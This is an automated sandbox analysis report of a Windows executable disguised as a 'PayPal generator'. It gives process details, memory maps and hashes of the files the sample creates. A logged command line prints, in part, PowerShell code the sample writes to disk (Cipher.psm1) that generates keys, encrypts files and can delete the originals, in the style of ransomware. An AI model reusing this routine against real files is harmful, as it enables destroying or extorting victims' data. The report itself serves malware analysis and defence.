928259fda8a87ca09db0e3554f3b40f392a508aed6b0e6d07d7a1a1fee69c255 (SHA256)
PayPal-Generator-2019.exe
Windows Exe (x86-32)
Created at 2019-02-07 19:10:00
Notifications (1/1)
The maximum number of reputation file hash requests (20 per analysis) was exceeded. As a result, the reputation status could not be queried for all file hashes. In order to get the reputation status for all file hashes, please increase the 'Max File Hash Requests' setting in the system configurations.
Monitored Processes
Behavior Information - Grouped by Category
Process #1: paypal-generator-2019.exe
5
0
| Information | Value |
|---|---|
| ID | #1 |
| File Name | c:\users\ciihmnxmn6ps\desktop\paypal-generator-2019.exe |
| Command Line | "C:\Users\CIiHmnxMn6Ps\Desktop\PayPal-Generator-2019.exe" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:00:40, Reason: Analysis Target |
| Unmonitor | End Time: 00:02:26, Reason: Self Terminated |
| Monitor Duration | 00:01:46 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xc48 |
| Parent PID | 0x57c (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
C38
0x
CA8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0029ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002a0000 | 0x002a0000 | 0x002a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x002b1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x002c0000 | 0x0037dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000380000 | 0x00380000 | 0x003bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003c0000 | 0x003c0000 | 0x003c0fff | Private Memory | rw |
|
|
|
- |
| paypal-generator-2019.exe | 0x00400000 | 0x00457fff | Memory Mapped File | rwx |
|
|
|
|
| private_0x00000000004b0000 | 0x004b0000 | 0x005affff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000630000 | 0x00630000 | 0x0063ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000650000 | 0x00650000 | 0x0065ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000660000 | 0x00660000 | 0x0085ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000860000 | 0x00860000 | 0x009e7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000009f0000 | 0x009f0000 | 0x00b70fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000b80000 | 0x00b80000 | 0x01f7ffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x746b0000 | 0x74740fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
Process (2)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | cmd.exe | - |
|
1 | |
| Create | cmd.exe | - |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-02-07 19:11:05 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 130250 |
|
1 |
Process #3: cmd.exe
1355
0
| Information | Value |
|---|---|
| ID | #3 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c cmd.exe /c mkdir %USERPROFILE%\Documents\WindowsPowerShell\Modules\Cipher & cd %USERPROFILE%\Documents\WindowsPowerShell\Modules\Cipher & echo function New-CryptographyKey() { > Cipher.psm1 & echo [CmdletBinding()] >> Cipher.psm1 & echo [OutputType([System.Security.SecureString])] >> Cipher.psm1 & echo [OutputType([String], ParameterSetName='PlainText')] >> Cipher.psm1 & echo Param([Parameter(Mandatory=$false, Position=1)] >> Cipher.psm1 & echo [ValidateSet('AES','DES','RC2','Rijndael','TripleDES')] >> Cipher.psm1 & echo [String]$Algorithm='AES', >> Cipher.psm1 & echo [Parameter(Mandatory=$false, Position=2)] >> Cipher.psm1 & echo [Int]$KeySize, >> Cipher.psm1 & echo [Parameter(ParameterSetName='PlainText')] >> Cipher.psm1 & echo [Switch]$AsPlainText) >> Cipher.psm1 & echo Process { >> Cipher.psm1 & echo try { >> Cipher.psm1 & echo $Crypto = [System.Security.Cryptography.SymmetricAlgorithm]::Create($Algorithm) >> Cipher.psm1 & echo if($PSBoundParameters.ContainsKey('KeySize')){ >> Cipher.psm1 & echo $Crypto.KeySize = $KeySize } >> Cipher.psm1 & echo $Crypto.GenerateKey() >> Cipher.psm1 & echo if($AsPlainText) { >> Cipher.psm1 & echo return [System.Convert]::ToBase64String($Crypto.Key) } >> Cipher.psm1 & echo else { >> Cipher.psm1 & echo return [System.Convert]::ToBase64String($Crypto.Key) ^| ConvertTo-SecureString -AsPlainText -Force } } >> Cipher.psm1 & echo catch { Write-Error $_ } } } >> Cipher.psm1 & echo Function Protect-File { >> Cipher.psm1 & echo [CmdletBinding(DefaultParameterSetName='SecureString')] >> Cipher.psm1 & echo [OutputType([System.IO.FileInfo[]])] >> Cipher.psm1 & echo Param([Parameter(Mandatory=$true, Position=1, ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)] >> Cipher.psm1 & echo [Alias('PSPath','LiteralPath')] >> Cipher.psm1 & echo [string[]]$FileName, >> Cipher.psm1 & echo [Parameter(Mandatory=$false, Position=2)] >> Cipher.psm1 & echo [ValidateSet('AES','DES','RC2','Rijndael','TripleDES')] >> Cipher.psm1 & echo [String]$Algorithm = 'AES', >> Cipher.psm1 & echo [Parameter(Mandatory=$false, Position=3, ParameterSetName='SecureString')] >> Cipher.psm1 & echo [System.Security.SecureString]$Key = (New-CryptographyKey -Algorithm $Algorithm), >> Cipher.psm1 & echo [Parameter(Mandatory=$true, Position=3, ParameterSetName='PlainText')] >> Cipher.psm1 & echo [String]$KeyAsPlainText, >> Cipher.psm1 & echo [Parameter(Mandatory=$false, Position=4)] >> Cipher.psm1 & echo [System.Security.Cryptography.CipherMode]$CipherMode, >> Cipher.psm1 & echo [Parameter(Mandatory=$false, Position=5)] >> Cipher.psm1 & echo [System.Security.Cryptography.PaddingMode]$PaddingMode, >> Cipher.psm1 & echo [Parameter(Mandatory=$false, Position=6)] >> Cipher.psm1 & echo [String]$Suffix = ".$Algorithm", >> Cipher.psm1 & echo [Parameter()] >> Cipher.psm1 & echo [Switch]$RemoveSource) >> Cipher.psm1 & echo Begin { try { >> Cipher.psm1 & echo if($PSCmdlet.ParameterSetName -eq 'PlainText') { >> Cipher.psm1 & echo $Key = $KeyAsPlainText ^| ConvertTo-SecureString -AsPlainText -Force} >> Cipher.psm1 & echo $BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($Key) >> Cipher.psm1 & echo $EncryptionKey = [System.Convert]::FromBase64String([System.Runtime.InteropServices.Marshal]::PtrToStringAuto($BSTR)) >> Cipher.psm1 & echo $Crypto = [System.Security.Cryptography.SymmetricAlgorithm]::Create($Algorithm) >> Cipher.psm1 & echo if($PSBoundParameters.ContainsKey('CipherMode')){ >> Cipher.psm1 & echo $Crypto.Mode = $CipherMode } >> Cipher.psm1 & echo if($PSBoundParameters.ContainsKey('PaddingMode')){ >> Cipher.psm1 & echo $Crypto.Padding = $PaddingMode } >> Cipher.psm1 & echo $Crypto.KeySize = $EncryptionKey.Length*8 >> Cipher.psm1 & echo $Crypto.Key = $EncryptionKey } >> Cipher.psm1 & echo Catch { Write-Error $_ -ErrorAction Stop } } >> Cipher.psm1 & echo Process { >> Cipher.psm1 & echo $Files = Get-Item -LiteralPath $FileName >> Cipher.psm1 & echo ForEach($File in $Files) { $DestinationFile = $File.FullName + $Suffix >> Cipher.psm1 & echo Try { >> Cipher.psm1 & echo $FileStreamReader = New-Object System.IO.FileStream($File.FullName, [System.IO.FileMode]::Open) >> Cipher.psm1 & echo $FileStreamWriter = New-Object System.IO.FileStream($DestinationFile, [System.IO.FileMode]::Create) >> Cipher.psm1 & echo $Crypto.GenerateIV() >> Cipher.psm1 & echo $FileStreamWriter.Write([System.BitConverter]::GetBytes($Crypto.IV.Length), 0, 4) >> Cipher.psm1 & echo $FileStreamWriter.Write($Cryp |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:00:47, Reason: Child Process |
| Unmonitor | End Time: 00:00:49, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x2f4 |
| Parent PID | 0xc48 (c:\users\ciihmnxmn6ps\desktop\paypal-generator-2019.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
A5C
0x
518
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000ca0000 | 0x00ca0000 | 0x00cbffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000ca0000 | 0x00ca0000 | 0x00caffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000cb0000 | 0x00cb0000 | 0x00cb3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000cc0000 | 0x00cc0000 | 0x00cc4fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000cc0000 | 0x00cc0000 | 0x00cc3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000cd0000 | 0x00cd0000 | 0x00ce3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000cf0000 | 0x00cf0000 | 0x00d2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d30000 | 0x00d30000 | 0x00e2ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000e30000 | 0x00e30000 | 0x00e33fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000e40000 | 0x00e40000 | 0x00e40fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000e50000 | 0x00e50000 | 0x00e51fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e60000 | 0x00e60000 | 0x00e9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ea0000 | 0x00ea0000 | 0x00eaffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00eb0000 | 0x00f6dfff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x01030000 | 0x0107ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001080000 | 0x01080000 | 0x0507ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000005150000 | 0x05150000 | 0x0524ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005250000 | 0x05250000 | 0x0534ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005500000 | 0x05500000 | 0x0550ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x05510000 | 0x05846fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007eb80000 | 0x7eb80000 | 0x7ec7ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ec80000 | 0x7ec80000 | 0x7eca2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007eca7000 | 0x7eca7000 | 0x7eca9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ecaa000 | 0x7ecaa000 | 0x7ecaafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ecac000 | 0x7ecac000 | 0x7ecaefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ecaf000 | 0x7ecaf000 | 0x7ecaffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| Cipher.psm1 | 2.16 KB |
MD5:
2986cf03632bb5e3122e61cbcc39df2b
SHA1: aec1b87c34e26ec39c8b138d5279d971df0c1990 SHA256: 38aa1afb7f76581cb747a3eaa4d991caee52f4864de67d75c797eb0e2ddc52b1 SSDeep: 48:h/4o45qLH5bLIeLRMLDMLMU6iQ45ugmSpsjFG:hZ45iZApU/xMg0Y |
|
|
| Cipher.psm1 | 2.34 KB |
MD5:
94f33233831194c8e238f1fad9c21cd1
SHA1: 5ee20d55891c1efff610fc85880c53926f858f16 SHA256: f049e53d2954a794b2a295cd680309f21e28cd27809af06b06bb3dbf99ab0671 SSDeep: 48:h/4o45qLH5bLIeLRMLDMLMU6iQ45ugmSpsjFVixr:hZ45iZApU/xMg0sr |
|
|
| Cipher.psm1 | 2.11 KB |
MD5:
f858d404e401ed889f22fae022063e0d
SHA1: d5087254bf5615b42e5834303c56493931508c74 SHA256: 2301f4b7fec709183393088bf903c9664a472af724f6fddb924cc63fb884a67c SSDeep: 48:h/4o45qLH5bLIeLRMLDMLMU6iQ45ugmSpsjFc:hZ45iZApU/xMg0q |
|
|
| Cipher.psm1 | 1.53 KB |
MD5:
5341544f54521e85a92c3da4b12a5732
SHA1: 833a0ed6310d0f9c7fa773ce93a26d136879a8ae SHA256: a6c343b33435b694385822b9eda2882f1a3fe4d062f141d3965f4402c46c6fae SSDeep: 24:h9R4kLS6A4MB9DFSR5iMSKH5UALFLIeLilIK08LQqK08L5o983tYITUU6nBA4MBF:h/4o45qLH5bLIeLRMLDMLMU6iv |
|
|
| Cipher.psm1 | 1.50 KB |
MD5:
35b0a9fd4b04c2fcd7284ddaad471fd0
SHA1: 3bf9535ec7a24651cdec02e68d565b3a23baa249 SHA256: aae2723f94da6c75d090de60869a1d69dd30260c2b9f198b52d6e33c2281a726 SSDeep: 24:h9R4kLS6A4MB9DFSR5iMSKH5UALFLIeLilIK08LQqK08L5o983tYITUU6nBA4MBc:h/4o45qLH5bLIeLRMLDMLMU6ii |
|
|
| Cipher.psm1 | 0.10 KB |
MD5:
71b26607b2b37cd8939e7bf2a3e22a04
SHA1: 382b8afacedf2b5908918135d2c5f171e313e7b6 SHA256: 04c2825313e045d3a725cdb3a5e5b638e3b4b12bb4303ec1a2bb129d0e9d6c09 SSDeep: 3:TMQU7gcVAOfaFtmbK5/yFVEVTjy2A3MQXA2xGMISvn:ANVBfaebf+TjlA8Dl+v |
|
|
| Cipher.psm1 | 4.21 KB |
MD5:
707c0a8da6c25e9e75bba6de9f339107
SHA1: 4d6ce092b54197cfc85cefc2e793449f8e9c6fa6 SHA256: dfe84d8c84d8020a784ff8860dd7591004eec8a18977b962fb4a8105c4eb450b SSDeep: 48:h/4o45qLH5bLIeLRMLDMLMU6iQ45ugmSpsjFVixHT2333WH59LGTRL1kLGLbXAv2:hZ45iZApU/xMg0syH+AHsSQS6G |
|
|
| Cipher.psm1 | 4.14 KB |
MD5:
8f849803f2b2b2151c556464f1514537
SHA1: 079989776bdb8af2aa44df759cd98524088e97a0 SHA256: e5dbee3ce8a72e7f4fd02f2a2b03495f70ebfaefebbc2fb5480602777c99b4c8 SSDeep: 48:h/4o45qLH5bLIeLRMLDMLMU6iQ45ugmSpsjFVixHT2333WH59LGTRL1kLGLbXAvZ:hZ45iZApU/xMg0syH+AHsSQS6J |
|
|
| Cipher.psm1 | 0.45 KB |
MD5:
f96fcbe7ca429e52eceb13016f91f909
SHA1: e153c30205ad8aeba754368f8ab08ced2d1b147c SHA256: e780aa13e6ad03550a42d0f206ad95ced61675ea4ba02badfa8d5b12c192c158 SSDeep: 12:AdaeYR4kLFo6AYgWMB9wXMMcDKWjFoR5Rc:h9R4kLS6A4MB9DFSR52 |
|
|
| Cipher.psm1 | 4.75 KB |
MD5:
362088a9414058530ab9e184949cff8c
SHA1: 3f02303518d2c6bf327d80a3eaf28a3d6c76e871 SHA256: f4bbb15a0b0d49fd845a09fc3bcee9f4dbb0dafd4fc322c52e59ba1e2bf696ac SSDeep: 48:h/4o45qLH5bLIeLRMLDMLMU6iQ45ugmSpsjFVixHT2333WH59LGTRL1kLGLbXAvI:hZ45iZApU/xMg0syH+AHsSQS6HF0B |
|
|
| cry.ps1 | 0.51 KB |
MD5:
b6c6aa0b6d630db2eb96f3e6c09a0bd3
SHA1: 881a3114f839344f3c561df2683ccd1f004e7c59 SHA256: 1de6faf521aaa4702dd14a6aecb9aebfeedbf7a9ec906edb33ce7c320d9b0159 SSDeep: 12:iSPKaq6rzW1JPCYeZkDWS6jnE132riMlWORfq:iS5/ifCY44NhVCdq |
|
|
| Cipher.psm1 | 1.09 KB |
MD5:
76526ae8e62ef0a1ad5d7cfc093f40c1
SHA1: 10be83eb99d2b4adc72677725ccde2d4c2af4aa0 SHA256: 50849799f58552e37882374427c404baa1c6f035c45139b61e4682a4b482d909 SSDeep: 24:h9R4kLS6A4MB9DFSR5iMSKH5UALFLIeLilIK08LQqK08L52:h/4o45qLH5bLIeLRMLDMLI |
|
|
| Cipher.psm1 | 1.39 KB |
MD5:
50e1652e22a5432f4ce8ce590aa8f68a
SHA1: 609a42919771a28b19c893f93267e0232cd62b12 SHA256: b9970cbb5df8f46d92f9ed03f71b486ac3780cba446ad3b210d6be65b5db7930 SSDeep: 24:h9R4kLS6A4MB9DFSR5iMSKH5UALFLIeLilIK08LQqK08L5o983tYITUU6nU:h/4o45qLH5bLIeLRMLDMLMU6U |
|
|
| Cipher.psm1 | 1.96 KB |
MD5:
82e9450a0f9d27c3c42a23495527291b
SHA1: 3678c14af256a9d9d58470bd2742f4f4c2896b8e SHA256: ace01c935c67c7f957def9156f2a8f872c587c5982da408ad735fbcd0321da8e SSDeep: 48:h/4o45qLH5bLIeLRMLDMLMU6iQ45ugmSQ:hZ45iZApU/xMgy |
|
|
| Cipher.psm1 | 4.83 KB |
MD5:
d5fc4ee428a3f340f86f38084d8012e0
SHA1: a13812856691ad73b97c867160862538914f6004 SHA256: 71f71e2b73ad53b848af9518856fd685532ca45b0b12f190fd086d6dc462e935 SSDeep: 48:h/4o45qLH5bLIeLRMLDMLMU6iQ45ugmSpsjFVixHT2333WH59LGTRL1kLGLbXAvb:hZ45iZApU/xMg0syH+AHsSQS6HF0s |
|
|
| Cipher.psm1 | 3.50 KB |
MD5:
7a5fb248ac7347cd7387daa0304b8eea
SHA1: e0ec35c89db7b63c91a9d716ff0ad1afea753a1b SHA256: aa2439c301eb352059c5b0b08282a47e5c02205465076f9762834f78013d8925 SSDeep: 48:h/4o45qLH5bLIeLRMLDMLMU6iQ45ugmSpsjFVixHT2333WH59LGTRL1kLGLbXAvx:hZ45iZApU/xMg0syH+AHsS2 |
|
|
| Cipher.psm1 | 0.64 KB |
MD5:
245134d1140c893e6160c68be2c1174c
SHA1: eb423bd8b6bed6bb2cd1ba8be88b2f40ace2f1f9 SHA256: d608b39cb929358ccecc31fc561a23f27b60f2a5bc87764d66a21d557e685cdc SSDeep: 12:AdaeYR4kLFo6AYgWMB9wXMMcDKWjFoR5R0Mq8iHqH5UAXbq:h9R4kLS6A4MB9DFSR5iMSKH5UALq |
|
|
| Cipher.psm1 | 4.37 KB |
MD5:
b85089cc3be73ab73340e36c0355d3ba
SHA1: c88545aa81022a69ce0e1cc4626b5f9945779809 SHA256: 4d0fd21cae6c00e5d722ac1b48669e5ee9ace8ab86f496a500aa9d1591b39721 SSDeep: 48:h/4o45qLH5bLIeLRMLDMLMU6iQ45ugmSpsjFVixHT2333WH59LGTRL1kLGLbXAvC:hZ45iZApU/xMg0syH+AHsSQS6Hy |
|
|
| Cipher.psm1 | 1.86 KB |
MD5:
f2f602ef8d86ecac8c0d9d9f2ab375cb
SHA1: d698bbdafe5936508a8b6270c96d8d4620f8565c SHA256: d01184dae635eeb3e6a5b89f608f6ce24ef262e49ea36a90a5d80b74fe7394fd SSDeep: 24:h9R4kLS6A4MB9DFSR5iMSKH5UALFLIeLilIK08LQqK08L5o983tYITUU6nBA4MBR:h/4o45qLH5bLIeLRMLDMLMU6iQ45ugx |
|
|
| Cipher.psm1 | 0.89 KB |
MD5:
6b7ed2afaf79c4cd792f31fa9e7e75bc
SHA1: d31cd970d93a7e2a38c25ade35ca04ea534c873b SHA256: 341002e308e037f1caaae51d25e82ca9d766c2582d7d74df66770db58eab9099 SSDeep: 24:h9R4kLS6A4MB9DFSR5iMSKH5UALFLIeLilIK08LQV:h/4o45qLH5bLIeLRMLM |
|
|
| Cipher.psm1 | 0.42 KB |
MD5:
7c0a676598d77510bc4ec5aef5fcd24e
SHA1: 2ab1d4ef8f97574dc90f472c5555e4d583305525 SHA256: 468d3ec32d44743f14c7d2d24e8813b87529dd3fde12027f0812855823149631 SSDeep: 6:ANVBfaebf+TjlA8Dl+kjlJ/ayFoOUKQSJCArgOA0gCMBVOA+BWBMMc56SEUzSvuj:AdaeYR4kLFo6AYgWMB9wXMMcDKWjFov |
|
|
| cry.ps1 | 0.02 KB |
MD5:
ff6231115763e93f33369b3fbc6d61ff
SHA1: 7c2ec6e16fe6f81bd8a8c15e4b87aaa2d251533b SHA256: f54d1522855aa7a57d456eb1ada7c732ea4db40e71ddc881b67e14fbee937f73 SSDeep: 3:pgaBWcn:t0c |
|
|
| Cipher.psm1 | 1.78 KB |
MD5:
cd232eb064f272116a81f2a6e98f102d
SHA1: a228860016af147527513814b565c78d5b8b6390 SHA256: 6e22e6a055b0bccba7ecea3a2fc272224f955667baa2a15717be561c72b6733a SSDeep: 24:h9R4kLS6A4MB9DFSR5iMSKH5UALFLIeLilIK08LQqK08L5o983tYITUU6nBA4MBj:h/4o45qLH5bLIeLRMLDMLMU6iQ45uc |
|
|
| Cipher.psm1 | 0.21 KB |
MD5:
382ddcf629ec164720e4a3bb9e9d4fca
SHA1: 4b031ed105cb525f5770292b655b5d1c63cbef4f SHA256: 758df7bfddc694fd348eb85774bca8b74e476139eb532c72cc38232d6033385f SSDeep: 3:TMQU7gcVAOfaFtmbK5/yFVEVTjy2A3MQXA2xGMISvMjwMfJ/A3RrezM4o2RUAGaa:ANVBfaebf+TjlA8Dl+kjlJ/ayFoOUKQ |
|
|
| Cipher.psm1 | 2.07 KB |
MD5:
c087cec48484e2083dbc5512a7b4c823
SHA1: 2185ef7a149acdfe2e93c8b016825c9bbd80d668 SHA256: db73d4ceb9cf8d9c9c6e9438ca5b9a5271ec08ea360fca890e7c5ea9e8774c33 SSDeep: 48:h/4o45qLH5bLIeLRMLDMLMU6iQ45ugmSpsN:hZ45iZApU/xMga |
|
|
| Cipher.psm1 | 4.92 KB |
MD5:
d9a425d8f6e550328d3b4932bcc68c28
SHA1: e78b28a9dabeaf3dce15f39eeb111a2d81b9acce SHA256: ac537ff94f1f739685f83cf597bfb63b58c9223fc75bc39fa9fbce7aebe656c8 SSDeep: 48:h/4o45qLH5bLIeLRMLDMLMU6iQ45ugmSpsjFVixHT2333WH59LGTRL1kLGLbXAvb:hZ45iZApU/xMg0syH+AHsSQS6HF0Y |
|
|
| Cipher.psm1 | 1.17 KB |
MD5:
c435ee5515674aed25e13c3caec2c2c0
SHA1: dc1810c2df4aecefc81608d3141aa6beb231fa7d SHA256: a47834b81ec12f2bb00e84a28e0439957268700a07cf6c589e9b7062602c3591 SSDeep: 24:h9R4kLS6A4MB9DFSR5iMSKH5UALFLIeLilIK08LQqK08L5o93:h/4o45qLH5bLIeLRMLDMLM |
|
|
| Cipher.psm1 | 5.23 KB |
MD5:
3d12427e874b39d71842b55ac7a7a800
SHA1: 7ff7b0da46a3cad3ed82e8ffa79de0e9a05a5f49 SHA256: 05cbcd057e2b47ddaf0b74ddf01b86ebd9b9ecbaa5cc66f8f9fdf02cd22e017d SSDeep: 48:h/4o45qLH5bLIeLRMLDMLMU6iQ45ugmSpsjFVixHT2333WH59LGTRL1kLGLbXAvN:hZ45iZApU/xMg0syH+AHsSQS6HF0aaA3 |
|
|
| Cipher.psm1 | 2.88 KB |
MD5:
fb665a544a7f55cf3fa8c7fde3c96643
SHA1: b62c7e52c439bf7bf58ae193ab10b906610a8cb9 SHA256: a6df7e98c1598b834fa76a3f8c0ee4d69a410b5134273ec317b799a3411d92f8 SSDeep: 48:h/4o45qLH5bLIeLRMLDMLMU6iQ45ugmSpsjFVixHT2333WH59LGTRL1F:hZ45iZApU/xMg0syH+AHF |
|
|
| Cipher.psm1 | 4.09 KB |
MD5:
863aa83c71d93eb99f08a2e9475b3ce7
SHA1: 17e2bd8a2a8a2f56936041376c9126c0518507e2 SHA256: a5b71f652bc59a0492707218d75c3ce4387e5b61bef5bb54b86a15056b6a1c30 SSDeep: 48:h/4o45qLH5bLIeLRMLDMLMU6iQ45ugmSpsjFVixHT2333WH59LGTRL1kLGLbXAvA:hZ45iZApU/xMg0syH+AHsSQS6Q |
|
|
| Cipher.psm1 | 3.12 KB |
MD5:
a29fc5fa04c634bf79bb150615d687a9
SHA1: 1ea4ef480ad05da5d41370a59a1bf3bf1f50173f SHA256: 83ad1890884a5eea00a0528715c8cbb84225e847d5e36b1430d8aebb4671be2b SSDeep: 48:h/4o45qLH5bLIeLRMLDMLMU6iQ45ugmSpsjFVixHT2333WH59LGTRL1kLGLbO:hZ45iZApU/xMg0syH+AH6 |
|
|
| Cipher.psm1 | 0.27 KB |
MD5:
a86be1e7709b29a4174f1d47166a813d
